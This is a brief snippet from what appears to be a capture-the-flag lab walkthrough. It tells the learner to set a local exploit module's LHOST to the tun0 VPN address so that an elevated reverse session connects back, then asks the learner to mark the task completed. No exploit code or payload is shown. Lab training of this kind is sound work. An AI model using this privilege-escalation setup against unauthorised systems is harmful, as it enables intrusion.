NOTE: The local exploit module may default LHOST to your eth0 address during this attack. If no elevated session comes back, type set lhost [Kali IP Address] (your VPN address on tun0) and run again.

Answer the questions below

Click 'Completed' once you have successfully elevated the machine
